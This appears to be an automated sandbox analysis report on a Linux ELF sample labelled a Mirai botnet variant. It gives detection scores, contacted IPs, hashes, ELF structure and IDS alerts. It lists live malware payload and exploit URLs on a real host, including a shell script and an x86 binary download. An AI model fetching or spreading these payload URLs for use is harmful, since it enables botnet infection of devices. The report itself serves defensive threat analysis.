⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
qynd1m1ejo.elf	71%	ReversingLabs	Linux.Trojan.Mirai
qynd1m1ejo.elf	68%	Virustotal		Browse
qynd1m1ejo.elf	100%	Avira	EXP/ELF.Mirai.Bootnet.Gen.o
qynd1m1ejo.elf	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://185.196.9.5:80/cgi-bin/ViewLog.asp	100%	Avira URL Cloud	malware
http://185.196.9.5/bins/x86	100%	Avira URL Cloud	malware
http://185.196.9.5/8UsA.sh;	100%	Avira URL Cloud	malware
http://185.196.9.5/bins/x86	18%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.24	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.196.9.5:80/cgi-bin/ViewLog.asp	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.196.9.5/8UsA.sh;	qynd1m1ejo.elf	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	qynd1m1ejo.elf	false		high
http://185.196.9.5/bins/x86	qynd1m1ejo.elf	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	qynd1m1ejo.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.231.17.253	unknown	Italy	3269	ASN-IBSNAZIT	false
85.211.15.162	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
62.188.186.100	unknown	United Kingdom	702	UUNETUS	false
88.66.228.31	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
31.60.104.193	unknown	Poland	5617	TPNETPL	false
41.188.184.76	unknown	Tanzania United Republic of	37084	simbanet-tzTZ	false
85.155.150.155	unknown	Spain	12357	COMUNITELSPAINES	false
65.113.180.8	unknown	United States	16526	BIRCH-TELECOMUS	false
31.85.27.145	unknown	United Kingdom	12576	EELtdGB	false
95.250.42.253	unknown	Italy	3269	ASN-IBSNAZIT	false
156.68.4.35	unknown	United States	297	AS297US	false
31.130.227.183	unknown	Switzerland	56554	IETF-MEETINGIETFMeetingNetworkCH	false
31.156.202.35	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
197.28.210.186	unknown	Tunisia	37492	ORANGE-TN	false
31.245.105.202	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
31.162.185.171	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
95.117.176.83	unknown	Germany	6805	TDDE-ASN1DE	false
95.215.48.36	unknown	Ukraine	48882	OPTIMA-SHID-ASUA	false
88.37.5.90	unknown	Italy	3269	ASN-IBSNAZIT	false
103.172.4.101	unknown	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
31.144.92.85	unknown	Ukraine	56515	OXYNET-ASPL	false
157.76.253.249	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
94.82.238.115	unknown	Italy	3269	ASN-IBSNAZIT	false
31.179.155.49	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
2.37.182.98	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
62.138.132.143	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
41.219.166.21	unknown	Nigeria	37196	SUDATEL-SENEGALSN	false
95.170.15.42	unknown	France	25540	ALPHALINK-ASFR	false
94.193.8.131	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
85.100.28.115	unknown	Turkey	9121	TTNETTR	false
85.18.200.240	unknown	Italy	12874	FASTWEBIT	false
95.64.90.72	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
103.244.180.120	unknown	New Zealand	132509	DAHL-AS-APDIGIWEBADVANCEDHOSTINGLIMITEDNZ	false
95.170.15.45	unknown	France	25540	ALPHALINK-ASFR	false
62.81.143.15	unknown	Spain	6739	ONO-ASCableuropa-ONOES	false
85.100.28.118	unknown	Turkey	9121	TTNETTR	false
95.250.42.247	unknown	Italy	3269	ASN-IBSNAZIT	false
62.161.114.242	unknown	France	3215	FranceTelecom-OrangeFR	false
85.140.83.185	unknown	Russian Federation	39001	MTSRU	false
172.96.141.10	unknown	United States	23470	RELIABLESITEUS	false
112.23.65.215	unknown	China	56046	CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN	false
62.81.118.57	unknown	Spain	6739	ONO-ASCableuropa-ONOES	false
112.4.118.144	unknown	China	56046	CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN	false
205.52.119.32	unknown	United States	2914	NTT-COMMUNICATIONS-2914US	false
85.4.129.144	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
112.236.255.189	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
31.77.209.46	unknown	United Kingdom	12576	EELtdGB	false
94.151.70.224	unknown	Denmark	9158	TELENOR_DANMARK_ASDK	false
62.19.114.233	unknown	Italy	16232	ASN-TIMServiceProviderIT	false
94.98.191.226	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
85.83.15.248	unknown	Denmark	9158	TELENOR_DANMARK_ASDK	false
12.69.83.71	unknown	United States	7018	ATT-INTERNET4US	false
213.119.135.75	unknown	Belgium	6848	TELENET-ASBE	false
64.53.62.39	unknown	United States	14615	ROCK-HILL-TELEPHONEUS	false
94.94.36.85	unknown	Italy	3269	ASN-IBSNAZIT	false
103.170.35.51	unknown	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
62.155.238.232	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
62.110.253.243	unknown	Italy	3269	ASN-IBSNAZIT	false
85.173.246.110	unknown	Russian Federation	42362	ALANIA-ASBranchformerSevosetinelectrosvyazRU	false
95.125.208.129	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
197.211.66.54	unknown	South Africa	29918	IMPOL-ASNZA	false
95.124.218.230	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
95.248.123.98	unknown	Italy	3269	ASN-IBSNAZIT	false
157.174.164.9	unknown	United States	26298	NET-BCBSF-ASNUS	false
31.86.186.142	unknown	United Kingdom	12576	EELtdGB	false
31.13.174.174	unknown	Germany	196819	TWK-KL-ASDE	false
62.74.130.69	unknown	Greece	12361	PANAFONET-ASAthensGreeceGR	false
32.80.11.73	unknown	United States	2686	ATGS-MMD-ASUS	false
85.228.7.133	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
88.122.158.229	unknown	France	12322	PROXADFR	false
80.236.21.74	unknown	France	21502	ASN-NUMERICABLEFR	false
94.36.115.110	unknown	Italy	8612	TISCALI-IT	false
85.248.194.59	unknown	Slovakia (SLOVAK Republic)	5578	AS-BENESTRABratislavaSlovakRepublicSK	false
62.74.130.71	unknown	Greece	12361	PANAFONET-ASAthensGreeceGR	false
95.152.245.231	unknown	United Kingdom	8190	MDNXGB	false
31.238.25.139	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
31.191.242.142	unknown	Italy	24608	WINDTRE-ASIT	false
95.217.252.212	unknown	Germany	24940	HETZNER-ASDE	false
85.173.246.101	unknown	Russian Federation	42362	ALANIA-ASBranchformerSevosetinelectrosvyazRU	false
95.150.154.191	unknown	United Kingdom	12576	EELtdGB	false
44.221.179.12	unknown	United States	14618	AMAZON-AESUS	false
192.230.154.166	unknown	United States	27229	WEBHOST-ASN1US	false
94.22.136.73	unknown	Finland	15527	ANVIASilmukkatie6VaasaFinlandFI	false
88.245.198.129	unknown	Turkey	9121	TTNETTR	false
94.22.136.75	unknown	Finland	15527	ANVIASilmukkatie6VaasaFinlandFI	false
175.143.137.191	unknown	Malaysia	4788	TMNET-AS-APTMNetInternetServiceProviderMY	false
94.85.218.81	unknown	Italy	3269	ASN-IBSNAZIT	false
85.43.244.72	unknown	Italy	3269	ASN-IBSNAZIT	false
157.19.32.100	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
174.208.25.10	unknown	United States	22394	CELLCOUS	false
85.154.160.253	unknown	Oman	28885	OMANTEL-NAP-ASOmanTelNAPOM	false
94.171.13.92	unknown	Netherlands	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
94.65.166.75	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
31.238.47.75	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
88.226.128.117	unknown	Turkey	9121	TTNETTR	false
85.206.40.11	unknown	Lithuania	5522	TELIA-LIETUVALT	false
94.20.111.35	unknown	Azerbaijan	201167	CASTEL-ASAZ	false
85.134.9.127	unknown	Finland	24751	MULTIFI-ASFI	false
94.208.51.108	unknown	Netherlands	33915	TNF-ASNL	false
151.71.40.90	unknown	Italy	1267	ASN-WINDTREIUNETEU	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
85.211.15.162	FVShYxZJpc.elf	Get hash	malicious	Mirai	Browse
	I7ZQ7COLuW	Get hash	malicious	Mirai	Browse
	ESE9OipUMK	Get hash	malicious	Mirai	Browse
	YeIbVzG5LX	Get hash	malicious	Mirai	Browse
197.28.210.186	7d1vWc1Lgm.elf	Get hash	malicious	Mirai	Browse
	V6lkvGNGV0.elf	Get hash	malicious	Mirai	Browse
	u9mQBADBnT.elf	Get hash	malicious	Mirai	Browse
31.162.185.171	ZiN5S8WV3r	Get hash	malicious	Mirai	Browse
62.188.186.100	AUIoXxgku9.elf	Get hash	malicious	Mirai	Browse
31.60.104.193	9cfysuNsX2.elf	Get hash	malicious	Mirai	Browse
41.188.184.76	arm.elf	Get hash	malicious	Mirai, Moobot	Browse
	7gQATrxtWs.elf	Get hash	malicious	Mirai	Browse
	bok.arm5-20230313-1127.elf	Get hash	malicious	Mirai	Browse
	x86-20220531-1350	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.Linux.BackDoor.Tsunami.970.3006.9678	Get hash	malicious	Mirai	Browse
85.155.150.155	7ZYPzWxM0T.elf	Get hash	malicious	Mirai	Browse
85.155.150.155	83uOpJxN4z.elf	Get hash	malicious	Mirai	Browse
31.85.27.145	d9PdCrDQ8X.elf	Get hash	malicious	Unknown	Browse
31.85.27.145	dBmJXcsqS4	Get hash	malicious	Unknown	Browse
156.68.4.35	Zeus.mips	Get hash	malicious	Mirai	Browse
156.68.4.35	VmYu8PV5gD	Get hash	malicious	Mirai	Browse
31.130.227.183	FoHTGoCWoz	Get hash	malicious	Mirai	Browse
31.130.227.183	YWeZVFVYfC	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	uQQyFHaoSO.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	KuWW00hIIF.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	V0LJvpav7m.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	ajNjvSIXbo.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	57viNakyQH.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	8gIL23fHBO.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	iVni7YmHu8.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	9J17iv9Si1.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	KX32RkGgYw.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	E7zqDGvr38.elf	Get hash	malicious	Mirai	Browse	162.213.35.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TISCALI-UKTalkTalkCommunicationsLimitedGB	V0LJvpav7m.elf	Get hash	malicious	Mirai	Browse	88.104.99.43
	8gIL23fHBO.elf	Get hash	malicious	Mirai	Browse	88.104.99.28
	Iq9FbxpCn8.elf	Get hash	malicious	Unknown	Browse	85.210.36.135
	HROFrIvvVk.elf	Get hash	malicious	Mirai	Browse	79.67.247.68
	ysxN9kZVuH.elf	Get hash	malicious	Mirai	Browse	79.73.27.38
	cotizaci#U00f3n1345.exe	Get hash	malicious	AgentTesla	Browse	89.168.121.175
	file.exe	Get hash	malicious	Remcos	Browse	89.168.121.175
	huhu.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	88.109.234.73
	SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe	Get hash	malicious	AgentTesla	Browse	89.168.121.175
	FsfqGy3wom.elf	Get hash	malicious	Moobot	Browse	80.46.83.243
UUNETUS	ajNjvSIXbo.elf	Get hash	malicious	Mirai	Browse	62.125.156.16
	Iq9FbxpCn8.elf	Get hash	malicious	Unknown	Browse	62.70.72.113
	https://parischen.autos/serene/dune/?box=red	Get hash	malicious	TechSupportScam	Browse	146.190.113.210
	2VDoipTd9L.elf	Get hash	malicious	Mirai	Browse	108.33.170.186
	dWK9PiLE9v.elf	Get hash	malicious	Mirai	Browse	65.225.140.137
	bLjDNQ7nb4.elf	Get hash	malicious	Mirai	Browse	108.17.85.42
	kGKsfEjR9J.elf	Get hash	malicious	Mirai	Browse	63.30.39.252
	ysxN9kZVuH.elf	Get hash	malicious	Mirai	Browse	108.10.164.244
	nnOhQG5PkE.elf	Get hash	malicious	Mirai	Browse	100.57.128.155
	7aAS1vjKFJ.elf	Get hash	malicious	Mirai	Browse	65.197.77.199
ASN-IBSNAZIT	O89nUxpP0C.elf	Get hash	malicious	Mirai	Browse	94.87.6.228
	uQQyFHaoSO.elf	Get hash	malicious	Mirai	Browse	95.252.144.207
	V0LJvpav7m.elf	Get hash	malicious	Mirai	Browse	95.253.134.178
	Ae59KStmue.elf	Get hash	malicious	Mirai	Browse	95.239.15.12
	ajNjvSIXbo.elf	Get hash	malicious	Mirai	Browse	94.94.61.36
	57viNakyQH.elf	Get hash	malicious	Mirai	Browse	95.226.168.208
	8gIL23fHBO.elf	Get hash	malicious	Mirai	Browse	94.82.238.157
	Iq9FbxpCn8.elf	Get hash	malicious	Unknown	Browse	95.242.144.165
	HROFrIvvVk.elf	Get hash	malicious	Mirai	Browse	87.3.161.105
	2VDoipTd9L.elf	Get hash	malicious	Mirai	Browse	82.50.78.16
VODANETInternationalIP-BackboneofVodafoneDE	O89nUxpP0C.elf	Get hash	malicious	Mirai	Browse	94.218.73.8
	uQQyFHaoSO.elf	Get hash	malicious	Mirai	Browse	94.216.58.30
	V0LJvpav7m.elf	Get hash	malicious	Mirai	Browse	178.7.142.78
	57viNakyQH.elf	Get hash	malicious	Mirai	Browse	94.216.58.10
	bLjDNQ7nb4.elf	Get hash	malicious	Mirai	Browse	92.211.60.205
	5z7qDyLr2T.elf	Get hash	malicious	Mirai	Browse	92.75.228.64
	2FHBAtMNms.elf	Get hash	malicious	Mirai	Browse	92.77.217.96
	VBCkJNitS4.elf	Get hash	malicious	Mirai, Okiru	Browse	188.96.14.196
	huhu.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	88.68.254.99
	huhu.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	178.8.196.0

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.429225045701579
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	qynd1m1ejo.elf
File size:	62'224 bytes
MD5:	bfedf409bceee1b2a8c3da0564b28cf0
SHA1:	73f29df6f52c6815eb662cde6ed8cac22e602363
SHA256:	337fa7c27a8932368a18f050c559c543d8e4e7d2d7a0a6a1703d744b3c5e1b8e
SHA512:	a56c5b59520321c25912ba6fdb6144c114f26ef571d907aaa3f36ac6ce37cde5bd194213d095f0964ca63d653ac3da480ff1a131899739c8cd43e156131071d3
SSDEEP:	1536:VMzVhePhrkmetvEuckIzN/hkfgiu5BSSs84IlZ6fUoBiA+pTLE:VMzVhePlkmetvBcxJhyu5BNAIlg9oAuf
TLSH:	725339C0A993DCF2DD1146B93177FF328636F436212AE9E7D7D9A923AC81E40910729D
File Content Preview:	.ELF....................d...4...........4. ...(..............................................p...p..@...............Q.td............................U..S.......w....h........[]...$.............U......=@q...t..5....$p.....$p......u........t....h.o..........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	61824
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0xe116	0x0	0x6	AX	16
.fini	PROGBITS	0x80561c6	0xe1c6	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x80561e0	0xe1e0	0xd20	0x0	0x2	A	32
.ctors	PROGBITS	0x8057000	0xf000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8057008	0xf008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8057020	0xf020	0x120	0x0	0x3	WA	32
.bss	NOBITS	0x8057140	0xf140	0x6a0	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0xf140	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0xef00	0xef00	6.4623	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0xf000	0x8057000	0x8057000	0x140	0x7e0	4.5352	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/25/24-19:02:54.981478	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42138	80	192.168.2.15	95.68.32.7
02/25/24-19:02:29.250092	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49994	80	192.168.2.15	112.196.22.241
02/25/24-19:03:00.998425	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35404	80	192.168.2.15	95.211.52.84
02/25/24-19:03:13.112715	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56542	80	192.168.2.15	88.85.252.35
02/25/24-19:02:57.959014	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49772	80	192.168.2.15	112.213.98.172
02/25/24-19:03:25.916277	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60470	80	192.168.2.15	95.101.58.131
02/25/24-19:03:28.348823	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40656	80	192.168.2.15	95.216.62.203
02/25/24-19:03:21.335052	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37982	80	192.168.2.15	88.64.137.209
02/25/24-19:03:12.601505	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33990	80	192.168.2.15	95.128.110.146
02/25/24-19:03:17.526994	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53198	80	192.168.2.15	88.99.236.140
02/25/24-19:02:54.970496	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40512	80	192.168.2.15	95.52.78.184
02/25/24-19:03:05.279017	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43302	80	192.168.2.15	95.101.237.182
02/25/24-19:03:17.527037	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59920	80	192.168.2.15	88.221.61.35
02/25/24-19:03:23.219912	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38396	80	192.168.2.15	112.175.14.4
02/25/24-19:02:49.724817	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38660	80	192.168.2.15	112.29.212.224
02/25/24-19:03:24.197630	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59080	80	192.168.2.15	95.101.232.57
02/25/24-19:03:08.210417	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56404	80	192.168.2.15	95.100.231.150
02/25/24-19:03:09.992140	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51440	80	192.168.2.15	112.140.185.145
02/25/24-19:02:21.771110	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40610	80	192.168.2.15	95.101.143.7
02/25/24-19:02:42.444967	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38500	80	192.168.2.15	88.221.214.188
02/25/24-19:02:54.122364	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40042	80	192.168.2.15	88.31.76.241
02/25/24-19:03:31.844451	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56412	80	192.168.2.15	112.124.57.246
02/25/24-19:03:03.012383	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50362	80	192.168.2.15	112.162.237.145
02/25/24-19:02:50.289330	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33250	80	192.168.2.15	88.221.171.28
02/25/24-19:02:58.029079	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35766	80	192.168.2.15	112.48.180.191
02/25/24-19:03:34.370742	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41530	80	192.168.2.15	95.173.162.44
02/25/24-19:02:28.813885	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47156	80	192.168.2.15	112.31.250.19
02/25/24-19:03:01.117044	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56296	80	192.168.2.15	95.100.231.150
02/25/24-19:02:45.198155	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55148	80	192.168.2.15	112.163.41.248
02/25/24-19:02:50.284027	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42514	80	192.168.2.15	88.221.28.225
02/25/24-19:02:54.220900	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60552	80	192.168.2.15	95.164.195.191
02/25/24-19:03:30.535840	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44842	80	192.168.2.15	112.80.145.157
02/25/24-19:02:36.331487	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43394	80	192.168.2.15	95.217.68.189
02/25/24-19:03:09.151421	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55078	80	192.168.2.15	112.184.176.83
02/25/24-19:03:34.715901	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38844	80	192.168.2.15	95.35.28.9
02/25/24-19:03:22.761541	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35496	80	192.168.2.15	95.0.243.228
02/25/24-19:03:36.163227	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40154	80	192.168.2.15	95.168.253.81
02/25/24-19:03:04.936111	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55942	80	192.168.2.15	95.0.0.250
02/25/24-19:03:36.011255	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57700	80	192.168.2.15	112.48.155.162
02/25/24-19:02:19.154983	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40882	80	192.168.2.15	95.56.81.125
02/25/24-19:02:42.364341	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38480	80	192.168.2.15	88.221.214.188
02/25/24-19:03:12.996842	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55752	80	192.168.2.15	88.221.46.16
02/25/24-19:03:34.335755	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49938	80	192.168.2.15	95.111.243.40
02/25/24-19:02:50.085136	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52596	80	192.168.2.15	88.119.169.103
02/25/24-19:02:21.694521	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57128	80	192.168.2.15	95.216.165.191
02/25/24-19:02:42.645187	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50230	80	192.168.2.15	95.110.222.87
02/25/24-19:03:15.119234	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44744	80	192.168.2.15	95.65.89.22
02/25/24-19:03:01.244868	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51920	80	192.168.2.15	95.101.20.68
02/25/24-19:02:57.345774	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43694	80	192.168.2.15	95.164.197.80
02/25/24-19:02:36.941339	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56020	80	192.168.2.15	95.86.87.72
02/25/24-19:02:21.732094	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50106	80	192.168.2.15	95.84.209.239
02/25/24-19:02:31.338613	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58600	80	192.168.2.15	112.65.171.122
02/25/24-19:02:57.975095	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47120	80	192.168.2.15	95.209.133.80
02/25/24-19:02:19.285110	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47292	80	192.168.2.15	95.90.146.125
02/25/24-19:03:26.147582	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56572	80	192.168.2.15	95.53.246.135
02/25/24-19:03:08.884703	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51070	80	192.168.2.15	95.100.64.108
02/25/24-19:02:27.181137	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54048	80	192.168.2.15	95.213.202.26
02/25/24-19:02:46.937025	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45732	80	192.168.2.15	112.31.148.231
02/25/24-19:02:36.526850	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39322	80	192.168.2.15	88.99.210.141
02/25/24-19:03:04.896217	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36982	80	192.168.2.15	95.144.131.146
02/25/24-19:02:57.443364	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50410	80	192.168.2.15	95.216.195.75
02/25/24-19:02:40.985314	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54920	80	192.168.2.15	88.208.215.191
02/25/24-19:02:28.839599	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45318	80	192.168.2.15	112.13.96.73
02/25/24-19:02:54.452491	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59322	80	192.168.2.15	95.101.49.14
02/25/24-19:03:34.342088	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51168	80	192.168.2.15	95.217.163.47
02/25/24-19:03:24.414046	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49268	80	192.168.2.15	88.221.17.173
02/25/24-19:02:19.121187	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58466	80	192.168.2.15	95.86.72.116
02/25/24-19:03:26.048339	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33262	80	192.168.2.15	95.169.192.197
02/25/24-19:02:27.201206	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50474	80	192.168.2.15	95.215.240.138
02/25/24-19:02:44.906970	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49816	80	192.168.2.15	112.168.70.180
02/25/24-19:03:22.821231	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59054	80	192.168.2.15	95.101.232.57
02/25/24-19:02:19.082096	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48418	80	192.168.2.15	95.217.145.162
02/25/24-19:03:00.993849	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35820	80	192.168.2.15	95.85.15.8
02/25/24-19:02:37.449418	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46112	80	192.168.2.15	112.214.239.215
02/25/24-19:03:21.315304	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53098	80	192.168.2.15	88.96.218.158
02/25/24-19:02:43.221586	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39104	80	192.168.2.15	112.197.41.86
02/25/24-19:02:19.139226	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55722	80	192.168.2.15	95.100.51.55
02/25/24-19:02:47.123310	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58634	80	192.168.2.15	88.221.213.164
